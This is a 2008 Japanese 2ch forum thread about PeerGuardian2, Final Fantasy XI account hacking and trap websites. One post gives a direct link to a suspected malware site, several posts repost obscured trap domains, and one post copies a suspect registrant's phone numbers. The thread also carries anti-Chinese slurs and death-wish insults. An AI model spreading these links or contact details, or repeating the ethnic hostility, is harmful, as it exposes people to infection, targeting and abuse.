【韓国　中国】PeerGuardian 23【YBBを弾こう】
http://tmp7.2ch.net/test/read.cgi/download/1204341836/

辺りを見たらしあわせになれるかもしれない
464 ：既にその名前は使われています：2008/03/18(火) 21:27:31.80 ID:M/DBgUog: PeerGuardian2というのは、ファイアウォールソフトの一種なんですか？
465 ：既にその名前は使われています：2008/03/18(火) 21:29:36.43 ID:Ntmz7CiR: >>463
軽く流し読みしたんだが、RCは使えるってことなのだろうか！

ありがとう！幸せになれそうだ
466 ：既にその名前は使われています：2008/03/18(火) 21:41:25.16 ID:4boS9Q9Y: >>464
/no
467 ：既にその名前は使われています：2008/03/18(火) 21:49:19.31 ID:oug738eB: IP毎はできてもポート毎はできないからあくまで簡易的に
468 ：既にその名前は使われています：2008/03/18(火) 21:57:54.46 ID:Ntmz7CiR: がー　Liteってヤツか・・・。
まぁそれでもだいぶマシになるだろう　　　ありがとね！

早く対応してほしいなぁ・・・
469 ：既にその名前は使われています：2008/03/18(火) 22:02:12.39 ID:oug738eB: >>468
どっちかにRC1 Testの日本語訳版をうぷろだに上げたっていうレス無かったけ？
そのブツが今もあるかは知らんけど
470 ：既にその名前は使われています：2008/03/18(火) 22:50:35.12 ID:Ntmz7CiR: 4号ってIndexアプロダかねぇ・・　鯖落ちてるから確かめようが無いし、どうも削除されてるっぽいな

がーーー　もうちょっと早く調べておけば
色々ありがとう！
471 ：既にその名前は使われています：2008/03/18(火) 22:58:17.63 ID:6seialR/: いい事考えた
課金止めたらアカハックされないんじゃね！？
472 ：既にその名前は使われています：2008/03/19(水) 00:12:43.71 ID:F+PUYGhE: フレンド登録でアカハックって、
ID分かれば　後は総アタックで割れる？　
んなきゃないかｗ
473 ：既にその名前は使われています：2008/03/19(水) 00:26:15.97 ID:QTOnxHwz: >>471
止めてもPOLアカウントが生きていて、キャラ削除状態になっていない限り分らない。
PCにIDとパス入った状態なら普通に抜かれる。
課金はシナ人が1か月分払うことになるが・・・

止めていたにもかかわらず、登録していたクレジットカード使われて鯖移動代3000円払わせられてたケースもあるんだから。
474 ：既にその名前は使われています：2008/03/19(水) 00:32:21.76 ID:j6dnDuvy: さて、こんなニュースがあった訳だが。
［セキュリティ］ニフティ、韓流コンテンツなどで改ざん被害、ウイルス感染の危険を警告
http://ime.nu/dailynews.yahoo.co.jp/fc/computer/internet_viruses/

ニフティ <3828> （和田一也社長）は、同社が運営するWebサイト「@nifty」のコンテンツの一部が不正に改ざんされ、
閲覧しただけでウイルス感染の危険があったと発表した。

手口といい、やっぱり福建中華一味だろうかね？
ニフティもどきドメインを取ったという件もあるしな。

ライブドアもどきドメインを多数取ったところにブログ乗っ取りがあった。
FC2もどきドメインを多数取ったところにテンプレ改竄騒ぎがあった。
今回はニフティもどきドメインを取ったところにコンテンツ改竄騒ぎ。
偶然とは思えんね。
475 ：既にその名前は使われています：2008/03/19(水) 01:20:59.08 ID:gkpj0FAs: FFブログ見ない俺はネ実にあるアニメ関係でやられると困る
だいたいブログにアクセスしても拒否されてはいれねえよ
476 ：既にその名前は使われています：2008/03/19(水) 01:26:51.68 ID:gkpj0FAs: ブログは見ない！で回避できそうだがネ実以外の板でurl張られたら無理そうだ・・
477 ：既にその名前は使われています：2008/03/19(水) 01:40:23.64 ID:dDLu0P7f: 「見ない」が回避策になると言うのなら
インターネット見ないかFFやめるが一番の回避策だな
478 ：既にその名前は使われています：2008/03/19(水) 01:44:21.51 ID:gkpj0FAs: 今ffを一生懸命やってる人ってなんでブログをみるんだろう
俺が現役のときはヴァナとネットの情報だけの２つで済んだんだが
479 ：既にその名前は使われています：2008/03/19(水) 03:12:17.88 ID:ZyT7Q3ph: ジョブや選択肢が増えて自分と同じ環境でのデータが欲しいからブログさがすんじゃね？
480 ：既にその名前は使われています：2008/03/19(水) 03:15:46.42 ID:AhgU4+61: ブログもネットの情報だと思うんだが
481 ：既にその名前は使われています：2008/03/19(水) 03:27:41.08 ID:/oKd9Jzx: 情報収集の意味あいよりもブログは
雑誌ならお便りコーナーとか、新聞なら投書欄的なものみたいな感じで
硬くなく、難しく考える事もなく、楽に読める娯楽の意味合いが強いんじゃないかな～
482 ：既にその名前は使われています：2008/03/19(水) 03:40:26.45 ID:4C++Lcq/: 最近は攻略記事をブログ形式で載せてるところも多いからな
ぺってんなんかはその典型だろう

攻略のためにぐぐってもブログが先にヒットすることも多いし
483 ：既にその名前は使われています：2008/03/19(水) 05:30:05.76 ID:WQ8w2b8e: だが、ブログは情報が偏り安い。
しかも、最近ブログ見てる人間のほとんどが情報イナゴ。
更新している人間に毎日催促。ネタがなくなると無かったかのように次のブログへ催促を続ける。
他人へ圧力かけ、自分の情報は出さないさまは、今の中国そっくりだからなー
484 ：既にその名前は使われています：2008/03/19(水) 05:32:55.87 ID:XCtqSLgJ: ハンゲームに昨日トロイがトップページにあったもんな
恐ろしいことじゃ
485 ：既にその名前は使われています：2008/03/19(水) 05:35:57.31 ID:XCtqSLgJ: 仏・クシュネール首相
「北京五輪の開会式ボイコットを欧州連合で検討するべき」
486 ：既にその名前は使われています：2008/03/19(水) 05:37:27.44 ID:XCtqSLgJ: 総務省が内閣府と検討中のネット犯罪への刑罰強化

最大罰金3000万ｗ

はやくやってくれｗ
487 ：既にその名前は使われています：2008/03/19(水) 05:52:13.60 ID:GWpVl/Sx: 正直垢ハックが出てくるまでは、業者とかどうでもいいとか思ってたわ、一応真っ当に稼いでるし、そんなに迷惑もかかってなかったし
でもこりゃないわなぁ、変なツールに仕込むわけでもなく、一般の普通のユーザーを騙そうとして、しかも被害にあった垢はエクレアもわざわざ捨てられて

マジ死ねよ
488 ：既にその名前は使われています：2008/03/19(水) 07:31:57.81 ID:xRNC8NSu: FFXI系のFC2ブログの偽装。
blog20fc2■com/ff11diary/
iframeは既出のinfosueek(略)。
489 ：既にその名前は使われています：2008/03/19(水) 07:49:59.56 ID:6VAv5s/v: 298 名前：既にその名前は使われています New! 投稿日：2008/03/18(火) 20:17:36.99 ID:+o5NgyEK
http://ime.nu/maplestorfy.w16.okwit.com/holy_immortals/

FF11PhotoRoom.html嬉しい
点は、マクロがサーバにバックＵＰでき

↑
これ垢ハック？
踏んじゃったよ
490 ：既にその名前は使われています：2008/03/19(水) 07:51:18.31 ID:xRNC8NSu: 直リンすんなカス
自分が踏んじゃったから他の人も踏んじゃえみたいに思ってるのか貴様は
491 ：既にその名前は使われています：2008/03/19(水) 07:52:56.96 ID:BCrnDDNT: >>489
消えろ、糞ッたれ垢ハッカーが
492 ：既にその名前は使われています：2008/03/19(水) 07:59:01.61 ID:gBs2pyma: >>489
とりあえず市ね
493 ：既にその名前は使われています：2008/03/19(水) 08:02:15.63 ID:nSTR6R50: 専用ブラつかっていようが、自分がクリックしなければ開かないんだから
そこはもう自己責任だろうと思うんだが。
記事の内容みたら、安易にクリックしていいものかどうかぐらい判断できるだろう？
494 ：既にその名前は使われています：2008/03/19(水) 08:12:24.58 ID:gBs2pyma: >>493
そういう事じゃないだろ
貼った方に責任がないような言い方すんじゃね～よ

危険なURLかもしれないと思ったのに何故他の人が
踏まないよう配慮できないのですか？って話だよ
直リン避けるのもそれが危険なURLかどうかも
ちょっとスレ読んだらわかることだろ。
踏ませるために貼ってるとしか思えない。
495 ：既にその名前は使われています：2008/03/19(水) 08:17:09.09 ID:xRNC8NSu: Safari3.1正式版来てた。
ttp://www.apple.com/jp/news/2008/mar/18safari.html
ttp://www.apple.com/jp/safari/download/

Bonjourはよくわからんけど(UPnPみたいなもん?)外しておきましょう。

Firefox3より先に出るとは思わなかった。
496 ：既にその名前は使われています：2008/03/19(水) 08:19:36.37 ID:6VAv5s/v: なんだこの餓鬼どもｗｗｗ
ちゃんと怪しいサイトかもしれないと書いてるだろｗｗ
踏むなよｗｗ
馬鹿かよｗｗｗｗｗｗｗ

日本語読めない子達か？ｗｗｗｗｗ
死ねよｗｗｗｗｗｗ

で、そこは垢ハックサイトなのかどうかはやくチェックしろカスｗｗｗ
497 ：既にその名前は使われています：2008/03/19(水) 08:20:55.72 ID:6VAv5s/v: >>494
おめーが馬鹿なだけｗｗｗｗｗｗ

この書き込みで踏むアホなんかお前だけだよｗｗｗ

今すぐリアルで死ねｗｗｗ
498 ：既にその名前は使われています：2008/03/19(水) 08:22:08.06 ID:BCrnDDNT: なんだ荒らしか
499 ：既にその名前は使われています：2008/03/19(水) 08:22:56.96 ID:xRNC8NSu: 自分でアカハックかどうかの判断もできない餓鬼は引っ込んでろ
500 ：既にその名前は使われています：2008/03/19(水) 08:32:53.31 ID:gBs2pyma: >>496
それが人に物を頼む態度か？
テンプレくらい読めや

＞おめーが馬鹿なだけｗｗｗｗｗｗ
＞この書き込みで踏むアホなんかお前だけだよｗｗｗ
そっくりそのままお前に返すわ
501 ：既にその名前は使われています：2008/03/19(水) 08:56:33.76 ID:xRNC8NSu: VistaSP1正式版
ttp://support.microsoft.com/kb/936330/
x86 ttp://www.microsoft.com/downloads/details.aspx?FamilyID=b0c7136d-5ebb-413b-89c9-cb3d06d12674&DisplayLang=ja
x64 ttp://www.microsoft.com/downloads/details.aspx?FamilyID=874a414b-32b2-41cc-bd8b-d71eda5ec07c&DisplayLang=ja
502 ：既にその名前は使われています：2008/03/19(水) 10:40:43.44 ID:ZyT7Q3ph: とりあえずPeerGuardian2で中華とか弾くようにしたら？
503 ：既にその名前は使われています：2008/03/19(水) 10:58:07.82 ID:5QJcK8OF: >>502
PG2はセキュリティソフトですか？

……って言い出すアホがいるからなぁ。
504 ：既にその名前は使われています：2008/03/19(水) 11:26:30.61 ID:mSEmp+6V: まじめに聞いてるのにと思ったとか来るかと思ったら煽りか、ディアで氏ね>>489
505 ：既にその名前は使われています：2008/03/19(水) 11:33:34.67 ID:CvOOVUGq: 串も刺さずにウイルス貼りとな＾＾；
506 ：既にその名前は使われています：2008/03/19(水) 11:57:27.05 ID:4C++Lcq/: まあここは上級者専用のスレじゃなくて注意喚起のためのスレなんだから
初心者には優しく被害者には塩を塗らずで行きましょう。
あ、煽りとウイルス貼りには厳しくておｋ
507 ：既にその名前は使われています：2008/03/19(水) 13:23:36.48 ID:ZyT7Q3ph: うちの親父クラスになると目覚まし時計の止め方が判らなくて破壊するとか、
「クリックしてください」と書いてるところを躊躇なくクリックするからな。
508 ：既にその名前は使われています：2008/03/19(水) 13:24:28.74 ID:mcxfacuC: オヤジさんﾃﾗ萌えｗ
509 ：既にその名前は使われています：2008/03/19(水) 13:59:06.22 ID:CvOOVUGq: 泣き止まないファービーを撲殺するオヤジとか
妄想しちまったじゃねーか＾＾
510 ：既にその名前は使われています：2008/03/19(水) 14:00:55.05 ID:xRNC8NSu: オヤジ:「『クリックしてください』と書いてあるからクリックしたんだ!
　クリックしちゃだめなら『クリックしないでください』と書け!」
511 ：既にその名前は使われています：2008/03/19(水) 14:03:27.28 ID:ZyT7Q3ph: >>510
まぁそんな感じに逆切れするから始末が悪い。
教えようとすると「詳しく教えろ」といい、詳しく教えると「おまえ、俺をバカにしてるのか！」とまた切れるので
親父のマシンはかなり起動遅いしウィルス蔓延してるだろうが俺はもうノータッチ。
512 ：既にその名前は使われています：2008/03/19(水) 14:04:33.57 ID:ZyT7Q3ph: ×「詳しく教えろ」
○「わかりやすくおしえろ」
513 ：既にその名前は使われています：2008/03/19(水) 14:06:07.89 ID:P1Cu3rKv: 何度も書くが、ライセンスもう一個買って仮想環境を手に入れろ。
それだけでほぼ安泰だ。
VMwarePlayerは無料で使える、メモリさえつんどけば動作も快適だ。
もう一台のネット用PCなんて必要ない。
514 ：既にその名前は使われています：2008/03/19(水) 14:07:16.46 ID:xRNC8NSu: >>511
そういうのに限って上司な件
515 ：既にその名前は使われています：2008/03/19(水) 14:42:06.81 ID:xoE/imAb: >>339
まず大前提としてパスワードを保存しない設定が必須。
（つまり起動時に自動的にログインする、という設定を外す）
その上で金曜夜にパスワードを毎週変更するのが吉。
これでトロイ仕込まれていても無問題。
おれはトロイを5種類くらい飼ったままにしてるが（ｗ）
これで垢ハックはされなくなった。
（ちなみにこの方策をとるまでにこの3週間で2回垢ハック経験ありｗ）

ただしキーロガータイプには無効。
516 ：既にその名前は使われています：2008/03/19(水) 14:44:34.21 ID:mSEmp+6V: >>515
いや、そんなの自慢げに語られましても
517 ：既にその名前は使われています：2008/03/19(水) 14:45:28.55 ID:xoE/imAb: >>401
現在流行しているトロイタイプの垢ハックツールに対抗するためには
パス変えるだけでは全く無意味。
なぜなら、パスワード設定ファイルそのものを盗んでいくから。
対策をとるなら、
パス変更に加え、パスワードを保存しない設定にしておくべき。
（つまり毎回毎回手入力でパスワードを入力してログインする）
518 ：既にその名前は使われています：2008/03/19(水) 14:51:43.79 ID:XcxvyX+6: >>515
削除しろよｗ
519 ：既にその名前は使われています：2008/03/19(水) 14:55:25.60 ID:4C++Lcq/: やはり業者さんでしょうか？
自称ハック被害者の割にセキュリティに関して反省の欠片も見受けられませんね。
トロイを仕掛けられた状態で金曜夜にパス変更をしたら、パスを盗まれた上で
サポセンが閉まって最悪の状態になりそうですが。
ローカル保存をしないことでトロイ対策ができるというのなら、
キーロガー対策はどうなさるおつもりで？
520 ：既にその名前は使われています：2008/03/19(水) 14:55:33.82 ID:+nhvIHJl: >>515
他人の趣味にケチつけるつもりはないんだが、
FF以外の情報は大丈夫なのか？ｗ
521 ：既にその名前は使われています：2008/03/19(水) 14:57:41.50 ID:ZyT7Q3ph: >>515
現在キーロガータイプが存在しない根拠クレ
522 ：既にその名前は使われています：2008/03/19(水) 15:01:29.53 ID:xoE/imAb: >>519
>>521
だって、セキュリティいっさい無しで
FF関連のブログに無防備にアクセスしまくって
その結果トロイに感染しまくってるんだが、
その結果垢ハックされまくっていたのが、
パスワード手入力するようにしただけで
さっぱり垢ハックされなくなったから。

>>520
あ、ちなみにFF以外の仕事やプライベートは全部Macで
やってるから、心配ないよ。
523 ：既にその名前は使われています：2008/03/19(水) 15:03:34.47 ID:IoWVz6V+: いつものMac君か。
もう相手にしないほうがいい
524 ：既にその名前は使われています：2008/03/19(水) 15:04:47.59 ID:xoE/imAb: いや、だから俺が言いたいのは、
・Windows Updateで最新版にする
・アンチウイルスソフトを常に最新の状態に保っておく
など
>>1-20あたりに書いてある対策も重要だが、
もっと手軽で確実にアカウント情報を守れる方法がある、
と言いたいわけ。
別に>>1-20あたりの対策を蔑視しているわけじゃないし、
時間ができたらやるつもりなんだけど、
それまでの時間稼ぎとして
「パスワード毎回手入力」は有効な方法、ってことがいいたいの。
525 ：既にその名前は使われています：2008/03/19(水) 15:06:09.62 ID:ZyT7Q3ph: >>522
根拠としては弱いな。
不特定多数へのロガーは手間かかるから簡易にパスひっこぬくワームが多いとは思うが
とりあえず誰かに迷惑かけるかもしれないので4匹飼ってる＾＾とか言ってないでワーム処分しとけ。
526 ：既にその名前は使われています：2008/03/19(水) 15:06:52.30 ID:xoE/imAb: >>525
すみません。明日仕事休みなのでさっそくワーム処分やっておきますｗ
527 ：既にその名前は使われています：2008/03/19(水) 15:26:48.06 ID:/Cgd0cyC: おまいら優しすぎｗいつものMacなんてスルーでいいじゃん。
ワーム飼うという感覚の馬鹿野郎だぜ？こんなの相手にするなよ。

俺らは情報共有と真に困ってる奴への助言＆適切な板への誘導だろう？
528 ：既にその名前は使われています：2008/03/19(水) 15:27:20.58 ID:ksC/8yuJ: やっぱりキーロガー型のがめんどいから少ないのかねぇ

毎度入力しますか
529 ：既にその名前は使われています：2008/03/19(水) 16:06:31.08 ID:XnAXB3B2: なんかいつも「PS2ならだいじょうぶ！」という輩がいるので貼っとくか

Spyware.AcePasswdSnif は、ローカルエリアネットワークを介したユーザーパスワードを監視し
キャプチャする、スパイウェアプログラムです。
ttp://www.symantec.com/ja/jp/business/security_response/writeup.jsp?docid=2008-030312-0133-99

簡単に言うと、同じルータに繋がってるPCがこれに感染するとパス抜かれる可能性がある。
530 ：既にその名前は使われています：2008/03/19(水) 16:29:10.95 ID:D81n/fz/: 業者スレ立てしたみたいだから注意な
↓

いつも参考にさせていただいております。
tp://live27.2ch.net/test/read.cgi/ogame/1205906152/
531 ：既にその名前は使われています：2008/03/19(水) 16:40:36.67 ID:+nhvIHJl: >>529
まったく詳しくないんだが、
これって、Windowsのユーザ、パスワードを盗むスパイウェアじゃないの？
PS2のDNAS認証時にIDとパスを盗むとかもするのか？
532 ：既にその名前は使われています：2008/03/19(水) 16:43:36.94 ID:xoE/imAb: >>530
試しに踏んでみたら、
JS/Agent.CGってやつに感染しますたｗ
明日削除しときますね。
533 ：既にその名前は使われています：2008/03/19(水) 16:45:59.71 ID:/Cgd0cyC: >>529
それはWinPC向けのウェアじゃないの？
PS2のパスワード設定ファイルには意味ないと思うのだが？

具体的にPS2の設定プログラムとデータ送信ファイルに、そのウェアが脅威なのか提示してくれ。
PS2の仕様分からないとかは勘弁なｗ
534 ：既にその名前は使われています：2008/03/19(水) 16:51:11.52 ID:/Cgd0cyC: >>532
そのスレ踏むだけで感染するの？
17のレス有るが．．
535 ：既にその名前は使われています：2008/03/19(水) 16:52:42.86 ID:isX3uPK5: >>1にURLがはられてる。infosueek
536 ：既にその名前は使われています：2008/03/19(水) 16:56:24.39 ID:/Cgd0cyC: >>535
スレ1に貼ってるURL群のことなんだね。てっきり新手法が来たと焦ったよ。
しかし、よくURL踏めるなｗ
537 ：既にその名前は使われています：2008/03/19(水) 17:02:59.92 ID:xRNC8NSu: はてなダイアリーの罠(?)ブログ
d.hatena■ne■jp/Uncool/
ま、これ自体は踏んでも無害。
はてなはiframeが使えないためか中華罠サイトへのリンクのみなので
危険性はwikiやbbs(2chなど)に爆撃される罠リンクなどと変わらん。
しかもzip直なので、わざわざ解凍して実行するようなボンクラは
正直言って擁護できんがとりあえず。今から通報先探す。
538 ：既にその名前は使われています：2008/03/19(水) 17:03:29.82 ID:xoE/imAb: てか約1名だけ、俺のことをセキュリティ面で疎い、
と考えているヤツがいるようだが、
勘違いしないでほしい。
なぜ、おれがFF（とエロゲｗ）以外の全てのことについて
Macを使っているのかを考えてみろ。
ようするにおまえらよりセキュリティ観念が高いからなのだよ。
そもそもMac使えば感染しないのに、そして
Macを使う、という選択肢も残されているのに、
なんでおまえらはわざわざWindowsを使うのか。
なんでわざわざウイルスまみれの汚い世界に住んでいるのか。
セキュリティのことをどうこういうやつらが
Windowsを使っていること自体がおかしいと個人的には思う。

少なくとも俺は>>527よりかはセキュリティ観念は高いと思ってる。
539 ：既にその名前は使われています：2008/03/19(水) 17:06:05.73 ID:mSEmp+6V: >>538
今更どんな言い訳しようが>>515で台無し
540 ：既にその名前は使われています：2008/03/19(水) 17:12:51.91 ID:8zs4ixT3: 新mac板ではxoE/imAbなヤツが来ると
“またバカが沸いたｗ”ってやられます
541 ：既にその名前は使われています：2008/03/19(水) 17:15:52.81 ID:WQ8w2b8e: >>538
まー落ち着け。
｢その｣一名は何時もの
｢罠サイト踏む奴は自衛出来てない馬鹿。泣き寝入りしろ｣
って言ってる業者だろーから、ほっとけ。
ま、でも余りに多く、毎日ＩＤ変えて｢罠サイトふ(ry｣って目に付く事やってきたら、投稿で自衛しないといけないかもだけどなー
542 ：既にその名前は使われています：2008/03/19(水) 17:18:14.68 ID:xRNC8NSu: >>537 に貼られられている885以外に886と887がある
(885と886は11日製造、887は17日製造)。
新しい887をスキャンしてみた。
ttp://www.virustotal.com/analisis/674dc160e17d0938d76e34db07ea2899
ほぼ検知するようだ。
こんなの見逃すのはよっぽどクs…ノートン…orz
543 ：既にその名前は使われています：2008/03/19(水) 17:29:03.89 ID:Uom24yZp: FFやってるPCでトロイもらってノホホンとしてるのか、強い子だな。
Windowsは>>538にとってはゲーム機かもしれんが、そうでもない人も居るわけで。

極論いえば、サイキョウのセキュリティはLAN接続をしないとかくだらない路線にいくんで
Macうんぬん、FF専用PCなどはあまり実用性が無いキガスル。

とまあ、スレ見る度不安になるんだがうちのフリーで固めたセキュリティソフト
AVGfree
Comodo pfw
spybot
あんまりブログとか見ないんだが、最近ウィルス反応はまったくないなァ。
だといっても自信があるわけでもないので、危険そうなURIには触れないようにしてるんだが・・。
544 ：既にその名前は使われています：2008/03/19(水) 17:29:18.26 ID:WQ8w2b8e: てか、今日はたんぱつwがやたらと多いな…
携帯からかけてるにわかセキュ房(おばはんwwww)は自重汁。
一度だけの被害を体験として協力押し付けられても質問者が困るだけだぞwwwww
寂しさだけでここにこられても、帰って混乱産むだけだからマジ自重汁。
545 ：既にその名前は使われています：2008/03/19(水) 17:33:04.78 ID:xoE/imAb: >>543
別に100%のセキュリティを求めることは期待してない。
100%を求めるならそれこそおまえがいうように
LANケーブルをぶったぎるしかない罠。
そんな極論を言っているわけじゃなくて、
現実的にMacにするだけでセキュリティは高まるっていってんの。
Mac使ったことないならどんだけクリーンな環境なのか知らんのかな。
おれはMacのセキュリティが万全と言ってるわけじゃないよ？
Macの環境はクリーンだと言ってるわけ。意味分かる？
546 ：既にその名前は使われています：2008/03/19(水) 17:37:19.87 ID:IoWVz6V+: ＞皮先とは、
皮先はAV機器板で強度の芝厨のMacerの荒し。自称、熊本住在で小児科のヤブ医者。
自スレやMac板などでは、　皮先くん ◆N3i.Qu1SoY　の小手半を使う。
小手半を出さないだけで、皮先は初心者スレにほぼ毎日来ている。
時間帯は、12～14　16～18　19～20　23～02時　位が多い。
小手半を出さなくても、用語と文体・主張内容からほぼ推定できる。

前スレにいたID自爆した自称被害者だろ、今のこの人。
最後まで喋っていたほうが勝ちだとか思ってるタイプだからスルーするに限る
547 ：既にその名前は使われています：2008/03/19(水) 17:38:51.10 ID:+nhvIHJl: なんかMacのCMみたいだな。俺様理論の一方的な押し付けっぽくてw
548 ：既にその名前は使われています：2008/03/19(水) 17:38:55.99 ID:ZyT7Q3ph: マックからの漏洩はなかったとしてもHDDは共有なわけだから仮想Windowsを起動した際そこからMacデータ流出はありえるんじゃね？
Trojanとかならどんな自己アップデートがくるかわからんぞ。
549 ：既にその名前は使われています：2008/03/19(水) 17:39:26.83 ID:ZyT7Q3ph: >>547
あのCMはイメージダウンだったよな…
550 ：既にその名前は使われています：2008/03/19(水) 17:40:28.95 ID:xoE/imAb: >>549
それがヤツのねらいだろ。
551 ：既にその名前は使われています：2008/03/19(水) 17:43:43.28 ID:mSEmp+6V: どんだけ力説しても、マシンにトロイあるまま放置してたり、踏みにいって感染する時点で
説得力０
552 ：既にその名前は使われています：2008/03/19(水) 17:44:10.63 ID:+nhvIHJl: 前はMac頑張れよ!!って思ってたのに、CM見て嫌いになったんだよなぁ
553 ：既にその名前は使われています：2008/03/19(水) 17:45:38.57 ID:Uom24yZp: >>545
MacやFF専用PCはたしかに安全かもしれんが
Windowsでもそのセキュリティやユーザーの意識を高める必要があるでしょってこと。
別に否定してるわけじゃない、あるものを有効にまず使うべきだってこと。

みんながみんなMacやFF専用PCもってりゃいいけど、そうでもないでしょ。
Windowsだって気をつけて使えば良いわけだし。
君もこの機会にWindowsのセキュリティ向上してみたら。
554 ：既にその名前は使われています：2008/03/19(水) 17:45:41.24 ID:xRNC8NSu: んなとのためにウン十万出してMacとMac用アプリを買い揃えて
Macの作法を学習するくらいなら
ルータとFWとアンチウイルスソフトを揃えたり
VirtualPCみたいな仮想環境を構築したほうが手軽だわ。

なんつーかね、年をとると別なOSとか覚える気になれんのよ。
MacでいいならLinuxでもいいわけだし。
555 ：既にその名前は使われています：2008/03/19(水) 17:49:01.71 ID:L3sI9EuA: そうやって俺たちをMac嫌いにさせるのが皮先のねらいってことに
そろそろ気づけよ・・・。>>41
556 ：既にその名前は使われています：2008/03/19(水) 18:02:40.36 ID:Z7oRlvw3: ちょっと聞きたいことがあるんだが・・・
自宅から接続してる時は特に問題ないんだが、
友達の家から接続するとやたらPG2が中国IP弾いてるんだが、これ感染してるのかな・・？
ノートPC持ち歩いてるから友達のPCを使って接続してるわけじゃないし・・・
どーなってるのorz
557 ：既にその名前は使われています：2008/03/19(水) 18:06:42.03 ID:Zrqn8L/0: >>556
他の情報がないからうんともすんとも。
その友達がサーバ立ててるとか、ファイル交換ソフトを使ってるとか・・・
558 ：既にその名前は使われています：2008/03/19(水) 18:07:26.60 ID:nDGPkPPd: 糞ﾜﾛﾀw
559 ：既にその名前は使われています：2008/03/19(水) 18:11:17.11 ID:Z7oRlvw3: >>556
サーバ立てたりファイル交換ソフトも使ってないみたいなんだ。

カスペルスキーのオンラインスキャンをインストールしてた時にもやたら中国IP弾いてて、
そこからネット見てない時もPG2が反応するようになったんだけど・・・
560 ：既にその名前は使われています：2008/03/19(水) 18:29:45.16 ID:4C++Lcq/: >>559
ファームウェアの更新でつないでるのかもしれない
DVDドライブとかに台湾製の部品使ってないか？
561 ：既にその名前は使われています：2008/03/19(水) 18:42:26.53 ID:Z7oRlvw3: >>560
うーん・・・それが原因なんだろうか・・・
でも以前はこんなこと一度も無かったんですよね。
いきなりこんなことになってもう訳が分からずorz

とりあえず、友達にそこらへんのこと聞いてみます。
ありがとうございました_(._.)_
562 ：既にその名前は使われています：2008/03/19(水) 18:54:47.01 ID:qfze3d38: >>538
MacもWinもつかってるけど、セキュリティ対策面じゃ、Macの方がレベル低いと思うぞ。
ユーザー数が少なくて、攻撃対象にされにくいからWinより被害でにくいだけだろ。

「攻撃対象にされにくいものを使う」ってのもセキュリティ対策ではあるけど、
いったん、攻撃対象にされれば、もろいわな。
Macを使うことがセキュリティ観念が高いことになるってとこには、同意できんわ┐(´д｀)┌
563 ：既にその名前は使われています：2008/03/19(水) 18:55:56.21 ID:JF4yIkjL: あまりPCに詳しくないのですが、PeerGuardian2を導入してみました。
そのあとPOLに接続しようとしたらブロックされるので
手動で許可する、を選択しても次から次へとブロックされてしまうのですが
これはなにが悪いのでしょうか(´Д⊂
564 ：既にその名前は使われています：2008/03/19(水) 18:58:54.11 ID:tHEtlt2e: >>536
導入時にテンプレにあるサイトとかは読んだかな？
とりあえず設定方法とか間違ってないか確認してから、
間違ってなかったらウイルス感染を疑うべき。
565 ：既にその名前は使われています：2008/03/19(水) 18:59:43.70 ID:tHEtlt2e: すごく、マチガエマシタ。
>>564は>>563へのレス。
566 ：既にその名前は使われています：2008/03/19(水) 19:00:19.80 ID:ZyT7Q3ph: >>563
俺のPG2はデフォルトでPOLブロックしなかったぞ。
567 ：既にその名前は使われています：2008/03/19(水) 19:01:09.55 ID:BCrnDDNT: >>562
Macを使う事で俺は被害者にならない、なら同意出来るんじゃね？w
568 ：既にその名前は使われています：2008/03/19(水) 19:04:53.50 ID:JF4yIkjL: 563です。

Spybotを走らせてみたのですが、異常は検知されなかった状態です。

PG2はそれから、一応マニュアルみながら設定して、PG2のリネージュのHPから
台湾や中国系のIPをはじくようにした所です。
>>デフォルトでPOLブロックしなかった
はじかないのが普通なんですね。
あーどこがいけないのかなぁ。もう一度読み直してきます・・orz
569 ：既にその名前は使われています：2008/03/19(水) 19:09:29.39 ID:ZyT7Q3ph: >>568
そこ読んでるなら、インスコするときに手順載ってるから読み飛ばさずに手順どおりやればいけるはず。
570 ：既にその名前は使われています：2008/03/19(水) 19:14:09.43 ID:qfze3d38: >>563
初回起動時のリスト選択で、P2Pのチェックを外さなかったと思われ・・・。
PG2開いて、保護タブのリスト管理で、説明にP2Pって書いてあるやつのチェック外せばおｋ。
571 ：既にその名前は使われています：2008/03/19(水) 19:20:35.00 ID:o61P5z79: >>563
なん手動でやってもブロックが次々にされるかというと、
スクウェアが使ってるIPアドレスは一個ではなく範囲で存在するから。
ＩＰアドレスを、検索サイトで表示させれば範囲で出てくるからそれを
ルールとして許可リスト作ればオッケー
まぁ上にあるようにP2Pのチェック外すのが一番簡単。
あまりPCに詳しくないならそれでもいいと思う。
572 ：既にその名前は使われています：2008/03/19(水) 19:21:05.61 ID:JF4yIkjL: >>570

563です。

>>P2Pのチェックを外さなかったと思われ・・・。

ドンピシャです！　外したらログインできるようになりました。
ありがとうございます！
P2Pってはずすべきだったのですねorz　
573 ：既にその名前は使われています：2008/03/19(水) 19:25:17.79 ID:qfze3d38: >>567
同意できんわ。

「Macを使う事で俺は被害者にならない」なんて、
セキュリティ観念としては最低だは(´・д・｀)
574 ：既にその名前は使われています：2008/03/19(水) 19:26:20.41 ID:JF4yIkjL: >>571
>>上にあるようにP2Pのチェック外すのが一番簡単。
>>あまりPCに詳しくないならそれでもいいと思う。

はい・・・決して詳しくないので、チェックは外しておきます。
ありがとうございます。
575 ：既にその名前は使われています：2008/03/19(水) 22:19:12.52 ID:nCW9WaQ/: 浮上
576 ：既にその名前は使われています：2008/03/19(水) 22:46:00.01 ID:nCW9WaQ/: もう150まで落ちた
577 ：既にその名前は使われています：2008/03/19(水) 23:02:29.48 ID:RZa5VtPo: ODN規制 No. 2
http://qb5.2ch.net/test/read.cgi/sec2ch/1200145532/16
\.odn.(ad|ne).jp (全サーバ規制) ※6回め ●永久規制

業者が罠サイト張りまくりで永久規制ですし

また中国からの書き込みあるかもしれないんで、見つけたら試しにBooもよろしく
逆引きできないIPなら焼けたはず～

串迎撃部隊＠2ch掲示板 -- Boo2008 --
http://boo.2ch.net/
578 ：既にその名前は使われています：2008/03/19(水) 23:04:27.61 ID:ZyT7Q3ph: 業者的にはODM規制されたところで別の基地経由で書き込めばいいわけだしなぁ・・・
業者迷惑
579 ：既にその名前は使われています：2008/03/19(水) 23:12:35.11 ID:j6dnDuvy: 福建中華の罠ドメインを見つけたんで気をつけてくれよな!

Domain name: livedoor-bbs■com
Registrant Contact:
fly bg
bugao fei
05972809666 fax: 13605909415
fujianlongyan
longyan Fujian 364000
cn
Created: 2008-03-18
580 ：既にその名前は使われています：2008/03/19(水) 23:25:48.60 ID:Ao95Yyk2: age
581 ：既にその名前は使われています：2008/03/19(水) 23:39:44.41 ID:kCexloZI: >>579
ドメインネームと発信地だけ書いてくれると
見やすくてありがたい。
